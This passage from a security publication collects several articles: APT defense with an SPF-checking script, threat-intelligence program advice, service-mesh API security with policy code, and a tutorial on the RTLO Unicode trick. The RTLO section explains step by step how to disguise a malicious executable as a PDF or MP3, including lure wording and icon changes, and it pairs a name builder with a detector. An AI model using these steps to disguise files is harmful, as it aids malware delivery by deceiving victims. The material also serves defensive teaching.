To conclude, an APT is a layered attack. Therefore, the defense should be designed in layers too. Start with phishing campaigns, whose aim is not to “catch” the unprepared employee but to give us a clear understanding of how vulnerable the human factor in the organization is. There should be procedures and policies that implement regular and mandatory training for employees: how to recognize phishing, how to report it, and how to protect themselves and the enterprise. Security professionals should never forget that employees are the first level of defense. Other policies can forbid any server outside of the company premises from sending emails from the organization’s domain, combined with operational security on the email gateway. Other functional security techniques shall be implemented regularly at the mail gateway level, and there are many good alternatives already offered by vendors. Good security protection at the host level is needed, plus tools that security teams can use to monitor end-system behavior offline, or, even better, integrated with automated intelligence. As discussed, network security shall be armed with tools for network traffic analysis which recognize malicious behavior. And finally, the organization shall invest in good security professionals; different security knowledge among the different teams is needed.
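The policy just described, that only the organization's own mail servers may send from its domain, is normally published as an SPF record in DNS and enforced on the receiving gateway. The checker below is an added example written for this article, not part of the original text or of any vendor product: the domain names, addresses and SPF records in it are constructed, and it evaluates only the ip4, ip6 and all mechanisms (include, a and mx would require DNS lookups and are treated as non-matching).

```python
import ipaddress

# Constructed SPF records for fictional domains (not real DNS data). The "-all" form
# rejects any sender not listed; "~all" only marks an unlisted sender as a softfail.
SPF_RECORDS = {
    "example-bank.test": "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8:10::/48 -all",
    "lax.test": "v=spf1 ip4:198.51.100.7 ~all",
}

RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Split an SPF TXT record into (qualifier, mechanism, argument) terms."""
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    terms = []
    for term in parts[1:]:
        qualifier = "+"                      # an unqualified mechanism means pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        terms.append((qualifier, mechanism.lower(), argument))
    return terms


def check_sender(sender_ip, mail_from_domain, records=SPF_RECORDS):
    """Evaluate ip4/ip6/all mechanisms in order; the first match wins, as in RFC 7208.
    include/a/mx would need DNS lookups and are treated as non-matching here."""
    ip = ipaddress.ip_address(sender_ip)
    record = records.get(mail_from_domain)
    if record is None:
        return "none"                        # the domain publishes no policy
    for qualifier, mechanism, argument in parse_spf(record):
        if mechanism == "all":
            return RESULT[qualifier]
        if mechanism in ("ip4", "ip6"):
            network = ipaddress.ip_network(argument, strict=False)
            if ip.version == network.version and ip in network:
                return RESULT[qualifier]
    return "neutral"                         # record ended without an "all" term


def gateway_decision(sender_ip, mail_from_domain):
    """Policy a receiving gateway could apply: hard fail -> reject, softfail -> quarantine."""
    result = check_sender(sender_ip, mail_from_domain)
    action = {"fail": "reject", "softfail": "quarantine"}.get(result, "accept")
    return action, result


if __name__ == "__main__":
    for ip, domain in [("203.0.113.45", "example-bank.test"),
                       ("192.0.2.9", "example-bank.test"),
                       ("198.51.100.8", "lax.test")]:
        print(ip, domain, gateway_decision(ip, domain))
```

The decision table in gateway_decision is the part an organization tunes: a hard fail from a domain that publishes "-all" is a message claiming to come from a server the domain owner never authorized, which is exactly the spear-phishing case the article describes.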
The leads should understand well that investment in their employees, continuous education and clarification, and better knowledge is mandatory. According to a study by ISACA, phishing is the most common way of launching an APT, as it gives the attacker an opportunity to gain initial access to the organization; considering the human factor as one of the biggest vulnerabilities makes designing a defense mechanism against initial attacks very difficult. It was evident from the study that 53.4% of the people believe APT is not much different from traditional attacking methods. However, 93.9% of the people agreed that APTs pose a significant threat to national security and economic stability. Among the critical findings in this survey paper are that 63% of the people believe that it’s just a matter of time before their organization becomes a victim of an APT attack, while only 60% believe that they are capable enough to stop such an attack [2].

The most effective fight against APT is having trained and knowledgeable information security analysts. Many security providers have adopted APT in their advertising. Some offer the opportunity to detect APT in the potential victim's networks. Another has even registered APT domain names. Tools are always helpful, but the best advice I can provide is to educate business leaders about threats so that they support organizational security programs drawn up by competent and knowledgeable employees [1]. An APT can be considered one of the most threatening security concerns. As the world advances towards IoT (Internet of Things), certain measures need to be taken so that APT attacks can be handled with ease [2]. At a technical level, building visibility will provide the organization with situational awareness and a chance to detect and thwart APT activity.
Without information from the network, hosts, logs, and other sources, even the most skilled analyst is rendered helpless. Fortunately, obtaining such information is not a new challenge, and most security departments are already running such programs [1]. The purpose of combating APT operations should be to make it as difficult as possible for an adversary trying to steal intellectual property or, as some say, to increase its price per megabyte.

References:
1. https://searchsecurity.techtarget.com/magazineContent/Understanding-the-advanced-persistentthreat
2. https://pdfs.semanticscholar.org/c6c3/06e7e4253885bd2d0ed25b8f2524fbbb2a92.pdf
3. https://www.techopedia.com/definition/25266/sandboxing
4. https://www.networkworld.com/category/advanced-persistent-threats/?start=20
5. https://interwork.com/wp-content/uploads/2016/12/sb01_dd_overview_140526us.pdf
6. https://www.helpnetsecurity.com/2012/03/01/trend-micro-unveils-apt-management-solution/

The Threat Intelligence EASY Button
Chris Cochran

Chris Cochran formerly served on active duty in US Marine Intelligence. Chris has dedicated his career to building advanced cybersecurity and intelligence capabilities for national-level governments and the private sector. He has led intelligence programs at the National Security Agency, US Cyber Command, the US House of Representatives, and financial and high-tech sector companies. He currently leads the threat intelligence and operations program at Netflix. Chris has made it his personal mission to motivate and empower cybersecurity professionals and teams through coaching, his podcast, and speaking engagements. His concern for the ever-growing cyber skill gap serves as a motivator for his need to inspire the next generation of cyber warriors to take the helm.
Introduction

We have all seen it. Ineffective threat intelligence is happening across the globe. There are teams writing resource-intensive weekly products that many will not read. There are companies buying intelligence feeds that will not be operationalized. There are intelligence teams that are not aligned to their stakeholders, and there is no process to gather feedback to make course corrections. This article is not an attempt to belittle the efforts of budding intelligence teams. This article aspires to be a guide for those building, executing, or consuming threat intelligence.

The more I grow in my career, the more I look to give back to the professionals making their way through the cybersecurity landscape. I found myself answering the same messages and questions about threat intelligence. One day I thought to myself, “Wouldn’t it be great to have a threat intelligence EASY button that people could press to help guide them through this process?” I have spent my career coaching intelligence analysts and teams, and 85% of that advice can be boiled down to four simple, but sometimes difficult, concepts that serve as a touchstone for intelligence leaders and practitioners.
These concepts are:
• Elicit Requirements
• Assess Collection Plan
• Strive for Impact
• Yield to Feedback

There you have it, the Intelligence EASY Button. These concepts are what I have always done, and with a dab of creativity I was able to distill my philosophy into digestible nuggets. Let's take some time to look at each of these individually.

Elicit Requirements

"It's not me, it's you." - Lily Allen

If you have been following my LinkedIn for a while or listen to my podcast, I have foot-stomped this concept on many occasions. Threat intelligence teams, companies, and experts are in the "service" business. We support OTHER functions. While I do believe threat intelligence leads security, our work is not about us, it is about our stakeholders. We need to know what information they require that will make their jobs more efficient, more effective, or change what they are doing entirely. You will encounter some stakeholders that do not know what information will aid those objectives. These are some of my favorite situations. You can have an "aha" moment right there with your stakeholders. Ask questions. Ask good questions. Practice asking questions and refine your stakeholder analysis. You will find that the more polished the requirements, the easier it is to support your stakeholders. You will want to do the best you can to get this right. Requirements are the foundation of an intelligence program. I have been a part of teams where this was not done. We would project our own thoughts and biases into our support of other teams without gathering the stakeholders’ thoughts or concerns. As you read this, I am sure you see how big of a misstep this is. However, this is not likely an isolated incident. In fact, many of the teams I have coached missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the calendar and schedule meetings with your stakeholders. During the meeting, be present and listen more than you speak.
Write down possible requirements and ask validation questions. You will then be on your way to building an effective program.

Assess Collection Plan

"Everybody has plans, until they get hit." - Mike Tyson

If you are starting a threat intelligence program and you have a fleshed-out collection plan before you did your first stakeholder interview, I assess with HIGH confidence that you will have to go back to the drawing board. Even after you have done stakeholder analysis, when new requirements come up you will have to look at what information you are currently using for your analysis. Ask yourself, "Is this feed answering the questions my stakeholders have?" Every feed is not for every team. A great source may not have the answers you are looking for. Constantly reassess your collection plan and be aggressive in trimming away the non-essential. When your requirements change, do some due diligence and make sure you can support them given your current collection posture. Threat feeds are not silver bullets for intelligence. Threat feeds can be an incredible force-multiplier or a waste of funds. Efforts must be made to ensure you are using the vendors and feeds you pay for. Look at efficient ways to enrich your incident response using this data. Use your feed to reach quick determinations on the reputation of indicators. Distill TTPs into digestible data points for your detection and threat hunting capabilities. Optimize your resources and squeeze all of the functionality out of your feeds. Once you have practice at this, it will be easier to do the same for other solutions.

Strive for Impact

“What you do has far greater impact than what you say.” - Stephen Covey

Let me paint a picture. You have spent the last two months working on a report you believe will change the game at your company. You were diligent in your analysis. You included the best research from world-renowned experts.
You polished it up real nice with the help of a couple of editors. You even had marketing take a stab at making graphics for you. You deliver your masterpiece and... crickets. You wait a few days and ask, "Hey, what was the reception of the report?" Your boss replies, "It was great work! Everyone loved it. The only problem is they didn't understand the 'So what?'" Ouch... I have been there, and I am sure many of you have been there too. The beauty of threat intelligence, or intelligence in general, is that it has the ability, and often the goal, of inciting change. The work I do can literally change the way my company operates, if I strive for impact in my intelligence analysis and reporting. Take some time and think about what information is going to whom, in what context, and to support what decision, every time you hit send on that email.

Let me let you in on a little secret. In my current role, I am cheating. I am responsible for threat intelligence and production, but I also lead threat operations, AKA our purple team. There are many definitions of a purple team. The way we look at it:
• Threat intelligence sets the threat context
• The red team emulates that threat in conjunction with risk priorities set by the organization
• The blue team, or threat hunters, are trying to find all of the malicious activity your security appliances are not, including the red team
• Ultimately, you want to automate a successful hunt and add to your detections

This process is incredibly powerful. You iteratively close gaps in the organization's security posture. I know what you must be thinking, “Chris, we do not have dedicated red teamers or threat hunters.” Neither do we at my current role. We have implemented a reservist model that allows people to step into those roles periodically so we can execute the mission without hiring dedicated teams. This reiterates the concept of optimizing what you have access to, including people.
Yield to Feedback

“Feedback is the breakfast of champions.” - Ken Blanchard

Before I even begin talking about using feedback, I feel obligated to provide a tip about receiving feedback. Please, make it easy for your stakeholder to present feedback. For instance, I built a simple Google form that I can send pre-filled with context data to the stakeholder, which can be filled in under a minute if they so wish. Subsequently, I produce a shareable link and personally message the stakeholder. I thank them for submitting the request for information and ask them to fill out the form. I also mention it will take only moments of their time. It is not my intent to boast, but under this construct I have a 100% return on my requests for feedback.

Now, once you have your feedback, use it! Even if you believe your stakeholder is misaligned in some way, that still means the mark is being missed. Are your reports too long? Are they missing key details? Was your intelligence not actionable? Was the delivery medium wrong? Did it take too long? These are just a few examples of things that, while they can bruise the ego, can incrementally improve your intelligence reports and, ultimately, your intelligence program. There are two vital measurements I set as mandatory fields for feedback: relevance and impact. The great part about this is that it ties back to the other tenets of the EASY button. Your relevancy should be high if you are answering the requirements set during the “Elicit Requirements” phase. These are the questions you need to answer for your stakeholder, and if you send something that isn’t relevant but you felt met the requirement, it is time to readdress your requirements with your stakeholder. Impact is vital for “Strive for Impact.” Did the information help the stakeholder DO or DECIDE something? If the intelligence did, you are on the right track. If it didn’t, do a bit of analysis as to why.
Maybe there was not enough context for the importance of the information. Maybe the message was not clear. Use feedback as a gift to make the program better.

Conclusion

I hope this helps the producers and the consumers of intelligence. Used correctly, threat intelligence can validate strategy bets for security, aid in the improvement of the security posture, and give impactful value to stakeholders around the organization. I also hope this demystifies intelligence and highlights the need to be proactive in security. In my philosophy, intelligence leads security. If you understand the threats your organization faces and you have your organization’s context in mind, you can get ahead of the ever-changing and never-ceasing threat.

Securing the API Economy
Abhi Singh

Abhi is a Senior Manager at Deloitte's Cyber Risk practice. He focuses on cyber security issues at large Financial Services clients. He has over 17 years of information security experience. His current focus areas include perimeterless security architecture and leveraging blockchain for security use cases.
API-led digital transformation and security

More and more financial services organizations (FSI) are making customer experience a part of their key performance indicators. This change leads to an increasing focus on delivering a more personalized service rather than a cookie-cutter approach led by the constant churn of new products. Given the nature of their business, most FSI organizations have massive troves of data that can be tapped using modern computing paradigms such as advanced data analytics, hyper cloud, and artificial intelligence. The insights learned can be used to provide a personalized, seamless experience in a multi-channel environment (e.g. mobile, web, connected devices, etc.).

An application programming interface (API) based model is the most logical choice for this transformation. APIs make it easier to integrate and connect people, places, systems, data, things, and algorithms; create new user experiences; share data and information; authenticate people and things; enable transactions and algorithms; leverage third-party algorithms; and create new products/services and business models. However, in this rapidly scalable and interlinked environment, security often takes a back seat to business agility. Our attempt in this paper is to describe a few security paradigms that can be included as part of the core API-based architecture to allow for agility and scalability.

Understanding the core architecture

One of the foundational elements of the API-based architecture is loose interlinkage between different applications or parts within the application. This loose coupling provides extensibility, reliability, and scalability. An application can be thought of as a Lego kit that is built from several individual pieces (microservices) [1], each serving a specific role and, when assembled in a definite manner (interfaces), forming a defined structure. Here is a typical architecture pattern for accessing a bank account:

Fig 1.
Simplified microservices-based financial application high-level architecture

In this (simplified) example, the user can query his information, such as the bank balance, using an app developed by the bank, via a finances aggregator app developed by a 3rd party, or via a normal web interface. In each case, the customer-facing microservice renders the correct UI based on the access and populates the data with the help of an aggregator service. The aggregator service (is supposed to) understand the data elements needed to satisfy the user query and needs to connect to a data repository or a storage microservice to fulfill it. Each of these microservices is independent of the others, and they interact using well-defined interfaces[2]. This loose coupling brings many benefits, such as on-demand scaling of any microservice; for example, based on the number of users accessing their accounts, the UI microservice can scale up or down with demand without impacting the others. Other advantages include predictable response due to the well-defined interface, lower computing overhead, faster time-to-market due to rapid releases, localized testing requirements, lower operational margins, and effective resource utilization by focusing resources on microservices rather than the entire application, amongst many others. This architecture is usually implemented using containers such as Docker[3]. To achieve the basic tenets (automated application deployment, scaling, and management), these containers are managed using container orchestration systems like k8s[4] and Docker Swarm[5]. Given our focus on securing the above architecture, we will not go into the details of these orchestration systems. However, the footnotes provide an authoritative background on the most commonly used systems.
Key security issues in this container-driven agile environment

Disregarding (for simplicity) the issues that manifest in a multi-cloud scenario, the traditional layered security defense doesn’t work in this case. Here are some reasons (not an exhaustive list):
• External-facing APIs present a great misuse target[6] as they can expose application logic and potentially sensitive data.
• Each microservice might have a small attack surface, but the combined attack surface of the overall system is hard to understand and defend.
• If each team can choose the language and frameworks for their microservice, it becomes extremely hard to manage the security risks in a standardized manner.
• There is no choke point in the flow or network, so logging, debugging, and access management become tricky.
• There is an implicit trust in the underlying hosts (or SaaS services in the case of public cloud) to be secure and to provide segmentation based on the risks posed by each container.
• In many cases these container hosts are dynamically created, so enforcing the security measures that protect the container runtime can be a challenge.
• Given the seamless flow of information between the containers, there is a strong possibility of lateral movement if one of the containers is compromised. This issue can also lead to container/microservice hopping following the predictable pattern of the application flow[7].
• Monitoring is a challenge as the environment changes dynamically, making it harder to correlate the data.
• Often microservices are made up of upstream proprietary and open source components. This can introduce downstream vulnerabilities[8].
• Managing encryption keys or shared secrets used by a container is a challenge because of the lack of secure methods for deploying identifying keys in microservices. The encryption keys or secrets might also be hard-coded into container images.
• Integrating identity and access management can be an issue, as there are multiple authentication and authorization mechanisms present in a company and not all of them may be compatible with the container.
• As the application becomes fragmented and communication is purely API-based, the developers have less visibility into the overall flow or business logic. This can lead to accidental exposure of information.

The (castle-wall based) tools currently available might not be fully capable of handling the new challenges mentioned above. There aren’t many firewalls that observe east-west flows within the data center, and managing access control lists in a dynamically changing environment is almost impossible.

Integrating security in the life cycle

The basic tenet of the challenges mentioned above is the breach of trust using something that we inherently trust, such as a workload running in a container[9]. This is the same as what we have in a traditional data center based infrastructure, like a breach using a server running on an internal network. To create a fundamentally secure infrastructure, we probably should not place any inherent trust in the network, leading to each system/container/pod becoming an island.

Fig 2. Breach is essentially localized

However, to achieve this architecture, the following key capabilities are required:
• Every flow on this network is known - applications have the capability to engage in TLS-based sessions.
• Every flow is authenticated and authorized - access control lists, encryption keys, and credentials need to be managed between microservices, all while services are being added or changed.
• The network by virtue implements least privilege without relying on developers for it.

This can be a manageability and scalability headache. One method to implement these capabilities is to use a “Service Mesh”[10]. This mesh will determine how each service discovers the others (discovery) and talks to them (routing).
This was previously done using load balancers in front of each service. Following this logic, most of these load balancers are manually managed, and if you were to add a new service, you would open a change ticket that would be serviced by IT. Load balancers introduce a cost penalty and an agility penalty based on how fast an organization turns around the tickets, thereby defeating the overall purpose of rapidly scaling using microservices. So, with a “Service Mesh”:
• All service-to-service communications happen via the Service Mesh (implemented as a software component, a proxy, placed adjacent to each microservice).
• There is a central registry that is dynamically managed as the service instances come online and offline, so new workloads can query this central registry to find the IP addresses of the services that they want to connect to.
• There is native support for some network functions such as resiliency, service discovery, etc. Application developers can focus on the business logic while network and security functions are offloaded to the service mesh.
• Circuit breaking can be achieved as a native feature.
• The capabilities are language agnostic.
• Security controls (encryption, authentication, authorization) can be implemented, managed, and scaled dynamically without actually modifying the application.

In order to enforce these security requirements and decisions, the proxy needs access to the workload (container) identity. These identities need to be created, rotated, and managed as the workloads change. The second tenet is a repository of authorizations maintained for each service. At a high level, the architecture would look similar to:

Fig 3. High-level design for enforcing security using a service mesh architecture

A policy server can be used to define identities using digital certificates and holds the keys to sign and validate these identities.
The agents manage the certificate lifecycle and the distribution of the correct certificates to the right proxies.

Fig 4. Service-mesh based flow

Advantages of the service mesh based design

Authentication becomes seamless, automated, and scalable
• In this decoupled design, the application can continue to function if there is an outage in the control plane
• Agents are only needed when the proxy boots or when the identity expires
• Because agents manage the identities (keys) automatically, the lifetime can be pretty short (e.g. 12 hours)
• There is no need to maintain keys in the enforcement plane, thereby reducing the attack surface
• Policy agents issue the identities to the service proxies, which in turn can use these identities to communicate over TLS using mutual authentication. The application does not need any changes in this case

Authorization can be enforced to minimize the attack surface
• The engine contains fine-grained application-level policies that describe the type of requests accepted at the service (workload) level (e.g. GET, the service accounts that are allowed access). So even though the proxy has the required identity, the request can still be deemed unauthorized if it’s not explicitly allowed in the policy server and enforced using the enforcement agents. Depending on the capability of the proxy to understand the details of protocols, you can enforce different match criteria
• The enforcement agent is only needed when the policy changes; otherwise, it is decoupled from the proxy
• When the proxy gets the access request, it performs the following steps:
  1. Authenticates the request
  2. Captures the details of the access requested
  3. Matches the request against the authorization policy as dictated by the enforcement agent
  4. Allows or denies the request

Other benefits
• The proxy can be used to collect and forward logs to a central (SIEM type) service. It can also integrate with other messaging systems[11].
• As the proxy intercepts all the traffic close to the workload, it is possible to identify accidental or intended data leaks.
• Compliance requirements of each type of workload can be defined in the policy server based on the data type, location, etc. Agents can calculate the proxy-specific compliance requirements. The proxies can then enforce them on a request-by-request basis.

Beyond infrastructure - Further reducing the attack surface

The above approach will reduce the attack surface exposed due to infrastructure elements. However, the APIs themselves may provide a viable breach target (though the impact might be localized and limited). Below are some strategies to mitigate the attack surface exposed by APIs[12].

1. Making security an integral part of the continuous delivery pipeline: At a high level, the flow along with the security components looks like below. Note that this is just a representation; check the footnotes for more definitive sources in this area[13].

Fig 5. Security in CI/CD pipeline

2. Focusing on compliance as a product: The DevOps Audit Defense Toolkit[14] summarizes the techniques that can be used to demonstrate to auditors that the company understands the business risks and is properly mitigating those risks. The compliance requirements are automated in the CI/CD pipeline tools. Change management is also automated, and every change in the code is tied back to an approved ticket. This enforces traceability and auditability.

3. Security of infrastructure code: The practices mentioned in the DevOps Audit Defense Toolkit are applicable in this area as well. Configuration management and automation tools like Ansible, Chef, and Puppet can be used to support the automated testing. Peer reviews are conducted before commits. All changes are logged and analyzed.

Leveraging provable security methods

Provable security[15] (or model-based validation) in our context means using formal methods to test and demonstrate the security of the design.
We start with threat modeling (albeit not considering side-channel attacks) and determine the coverage provided by the controls as the attack manifests. The above-mentioned design is based on two high-level sets of policies:
1. Identification / authentication / access control lists, and
2. Authorization

The objective here would be to develop an automated system that would validate the security of the design by comparing it against the defined benchmarks (or the set of fundamental rules that we have defined for the particular environment). For example, a benchmark can be that the production systems should only be accessible via a jump host, or that the user IDs that have access to the systems change based on the time of day (such as an on-call roster). As in traditional design, we can leverage threat modeling[16] to determine the potential vulnerabilities (and hopefully the associated attack trees). Once we understand these vulnerabilities, we can determine the corresponding rules that can be enforced using the policies described on the Policy Server. These policies describe the expected state (benchmark policies) of the environment that should be enforced by agents through proxies. During day-to-day operations, the system admins, application owners, and others will define new policies. Before the new policies can be implemented, they can be compared automatically (as part of the CI/CD pipeline) with the pre-defined benchmarks. So the flow might look like:

Fig 6. Embedding provable security in CI/CD flow

The advantage of this process is that it is completely transparent to the developers or infrastructure engineers. When a change to the existing environment is pushed (for example, a new app version that requires modifications to the existing access or authorization policies), the change is automatically routed to the analysis engine.
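As an added example (not code from the paper or from any service mesh product), the Python below models the two policy layers this paper describes: the four steps a proxy performs on a request (authenticate the short-lived identity, capture the request details, match it against the authorization policy, allow or deny), and the benchmark comparison the analysis engine runs on a proposed policy change before it reaches production. The SPIFFE-style identity names, the account-storage service, the 12-hour identity lifetime taken from the advantages list, and the benchmark rules (the jump-host rule from the text plus a no-wildcard-principal rule) are assumptions made for the demo.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Workload identities in SPIFFE style (assumed naming, not from the paper).
JUMPHOST = "spiffe://bank.test/ns/prod/sa/jumphost"
AGGREGATOR = "spiffe://bank.test/ns/prod/sa/aggregator"
UI = "spiffe://bank.test/ns/prod/sa/ui"

NOW = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)   # constructed clock for the demo
LATER = NOW + timedelta(hours=13)                        # past a 12-hour identity lifetime


@dataclass
class WorkloadIdentity:
    """What a policy agent hands to a proxy: a certificate-backed name with a short lifetime."""
    spiffe_id: str
    not_after: datetime


@dataclass
class Request:
    identity: WorkloadIdentity   # established by the mutual-TLS handshake
    method: str
    path: str


@dataclass
class Rule:
    """One allow rule: this caller may use these methods on paths matching the pattern."""
    principal: str
    methods: set
    path_pattern: str


@dataclass
class ServicePolicy:
    service: str
    rules: list = field(default_factory=list)


def identity_for(spiffe_id, issued_at=NOW, lifetime_hours=12):
    return WorkloadIdentity(spiffe_id, issued_at + timedelta(hours=lifetime_hours))


def authorize(req, policy, now=NOW):
    """The proxy's four steps. Returns (decision, reason); anything not explicitly allowed is denied."""
    # 1. Authenticate: the peer certificate was verified by mTLS; reject expired identities.
    if req.identity.not_after <= now:
        return "deny", "identity expired; the agent must re-issue it"
    # 2. Capture the details of the access requested.
    principal, method, path = req.identity.spiffe_id, req.method.upper(), req.path
    # 3. Match against the policy pushed by the enforcement agent.
    for rule in policy.rules:
        if (rule.principal == principal and method in rule.methods
                and re.fullmatch(rule.path_pattern, path)):
            return "allow", f"rule for {principal} on {rule.path_pattern}"   # 4a. allow
    return "deny", f"no rule allows {principal} {method} {path} on {policy.service}"  # 4b. deny


# Benchmarks: fundamental rules the analysis engine checks every proposed policy against.
def only_jumphost_on_admin(rule):
    if rule.path_pattern.startswith("/admin") and rule.principal != JUMPHOST:
        return "production admin path reachable by a non-jump-host identity"
    return None


def no_wildcard_principal(rule):
    if rule.principal == "*":
        return "wildcard principal grants access to any workload"
    return None


BENCHMARKS = [only_jumphost_on_admin, no_wildcard_principal]


def benchmark_findings(policy, benchmarks=BENCHMARKS):
    """One finding per violating rule, naming the exact policy element to fix."""
    findings = []
    for rule in policy.rules:
        for check in benchmarks:
            message = check(rule)
            if message:
                findings.append((policy.service, rule.principal, rule.path_pattern, message))
    return findings


def sample_policy():
    """Authorization policy for the account-storage service (constructed)."""
    return ServicePolicy("account-storage", [
        Rule(AGGREGATOR, {"GET"}, r"/accounts/[0-9]+/balance"),
        Rule(JUMPHOST, {"GET", "POST"}, r"/admin/.*"),
    ])


def proposed_change():
    """A developer's change that lets the UI workload reach an admin path directly."""
    policy = sample_policy()
    policy.rules.append(Rule(UI, {"GET"}, r"/admin/reindex"))
    return policy


if __name__ == "__main__":
    print(authorize(Request(identity_for(AGGREGATOR), "GET", "/accounts/42/balance"), sample_policy()))
    for finding in benchmark_findings(proposed_change()):
        print("benchmark violation:", finding)
```

Two design points carry over to a real deployment: the proxy never consults the policy server at request time (it only matches the rules the agent already pushed), and the benchmark output identifies the single rule to change rather than rejecting the whole policy, which is what makes the pipeline check transparent to the developer.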
The engine then compares the change against the benchmarks and highlights the policy areas that violate the required security thresholds. Because the analysis is done at the level of individual policy elements, the output (and the remediation advice) names the exact elements that must be modified to meet the required criteria. In addition, the CI/CD pipeline can be configured to check policy changes against the baseline before a change ticket is filed.

References:
[1] https://doi.ieeecomputersociety.org/10.1109/MS.2018.2141039
[2] https://en.wikipedia.org/wiki/Application_programming_interface
[3] https://en.wikipedia.org/wiki/Docker_(software)
[4] https://github.com/kubernetes/kubernetes
[5] https://docs.docker.com/engine/swarm/
[6] https://www.owasp.org/index.php/OWASP_API_Security_Project
[7] https://dl.acm.org/citation.cfm?id=3274720
[8] https://github.com/devsecops/devsecops
[9] https://ai.google/research/pubs/pub43231
[10] https://www.nginx.com/blog/what-is-a-service-mesh/
[11] https://kafka.apache.org/
[12] https://www.owasp.org/index.php/OWASP_API_Security_Project
[13] https://www.devsecops.org/, https://www.devsecopsdays.com/
[14] https://itrevolution.com/devops-audit-defense-toolkit/
[15] https://en.wikipedia.org/wiki/Provable_security
[16] https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html

Right to Left Override (RTLO) Technique

Pal Patel

Pal Patel is a Security Researcher, Penetration Tester and Bug Bounty Hunter with over 3 years of experience. Pal has been rewarded by more than 250 companies for finding loopholes in their systems.

RTLO stands for RIGHT-TO-LEFT OVERRIDE. It is the Unicode control character U+202E, part of the bidirectional text support that scripts such as Arabic and Hebrew rely on. It instructs the rendering software to display the text that follows it in right-to-left order, so the characters after it appear reversed on screen even though the underlying string is unchanged.
RTLO has been used in phishing attacks for many years: attackers insert the RTLO character into the file name of an attachment to make the attachment look harmless.

What is RTLO?

RTLO (RIGHT-TO-LEFT OVERRIDE, U+202E) is a Unicode bidirectional control character. Everything after it is rendered right to left, so the characters that follow it appear reversed while the actual bytes of the name are unchanged. For example, a file whose real name is "malware[U+202E]gpj.exe" is displayed as "malwareexe.jpg": the override sits just before "gpj.exe", and that tail renders reversed. The file is still an executable, because the operating system uses the real name, not the displayed one.

The RTLO character can be found in Character Map (on Windows, search for U+202E).

How do you trick a victim using the RTLO technique?

This trick is commonly used in chat functionality while talking to a victim. For example: "Hey check out my new song at example.com/song[rtlo]3pm.exe." Replace the placeholder [rtlo] in the URL with the actual RTLO character copied from Character Map and send the URL to the victim. When the victim receives it, the message looks like: "Hey check out my new song at example.com/songexe.mp3." Seeing "mp3", the victim assumes it is a song and clicks the link. As soon as the link is opened, the override is no longer hidden: the address is shown in its percent-encoded form, http://example.com/song%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE3pm.exe, where %E2%80%AE is the UTF-8 encoding of U+202E (the example has the character pasted several times). Other social engineering techniques can be combined with RTLO in the same way. Twitter, Skype, Snapchat, etc., have protection against the RTLO technique in chat functionality.
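The following Python script is an added example, not part of the original article, that builds an RTLO-disguised name the way described above and, more usefully for a defender, shows how to render what a victim would see, recover the real extension, and flag file names or URLs that carry a bidirectional override, including the percent-encoded form %E2%80%AE that appears in the address bar. The rendering is a deliberately simplified model of the Unicode bidirectional algorithm: it reverses everything after each override up to the next one, which is enough for the file-name cases here. All names and URLs are constructed for the example.

```python
"""RTLO (U+202E) file-name tricks: build, render and detect (example code)."""
import os
from urllib.parse import unquote

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
# Bidi controls that can change how a name is displayed: LRE, RLE, PDF, LRO, RLO and the isolates.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")


def build_rtlo_name(prefix: str, true_ext: str, fake_ext: str) -> str:
    """Real file name that displays as <prefix><true_ext>.<fake_ext> but really ends in .<true_ext>.
    build_rtlo_name("doc", "exe", "pdf") -> "doc\u202efdp.exe", displayed as "docexe.pdf"."""
    return prefix + RLO + f"{true_ext}.{fake_ext}"[::-1]


def rendered(name: str) -> str:
    """Simplified display model: text after each RLO is shown reversed (up to the next RLO).
    The real bidirectional algorithm is more involved, but this matches the file-name cases."""
    parts = name.split(RLO)
    return parts[0] + "".join(part[::-1] for part in parts[1:])


def real_extension(name: str) -> str:
    """Extension the OS will actually use: strip bidi controls and take the last suffix."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return os.path.splitext(cleaned)[1].lstrip(".").lower()


def audit(name_or_url: str) -> dict:
    """Flag a file name or URL whose displayed extension differs from its real one.
    Percent-encoded input (e.g. %E2%80%AE) is decoded first, as a browser would."""
    decoded = unquote(name_or_url)
    shown = rendered(decoded)
    real = real_extension(decoded)
    has_override = any(ch in BIDI_CONTROLS for ch in decoded)
    displayed_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    return {
        "displayed": shown,
        "real_extension": real,
        "suspicious": has_override or displayed_ext != real,
    }


if __name__ == "__main__":
    # Constructed samples: two disguised file names, the chat URL from the article, and a clean name.
    for sample in [build_rtlo_name("doc", "exe", "pdf"),
                   "malware\u202egpj.exe",
                   "http://example.com/song%E2%80%AE3pm.exe",
                   "report.pdf"]:
        print(repr(sample), "->", audit(sample))
```

On the defensive side, the check worth keeping is the last one: any bidirectional control character in a file name, attachment name or URL path is a reason to reject or quarantine it, regardless of what the rendered name looks like.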
This technique is a bit old, but it is still used to deliver malware, backdoors and so on. Let's take another example:

• There is a malicious file named doc.exe.
• Decide which extension the victim should see and write it in reverse: for "doc" write "cod", for "pdf" write "fdp".
• Copy the RTLO character from Character Map and paste it between the base name and the reversed tail, so that the real name of the file is "doc[RTLO]fdp.exe".
• Displayed, the file appears as "docexe.pdf", and the victim can be tricked by the apparent extension.
• It is also a good idea to change the icon of the malicious file and to choose a name that fits the disguise, for example a malicious file posing as a Microsoft Word document with a plausible name, so that the real extension is preserved but the user is fooled.

Conclusion

Hackers use every trick in the book to disguise their malicious files. Read more about phishing techniques and ways to protect yourself. These tricks are very easy to implement and effective. We should be vigilant about every URL we open and every file we download. As they say, the devil lies in the details. BE SAFE, BE SECURE!!

References:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/

Antivirus Evasion Basics

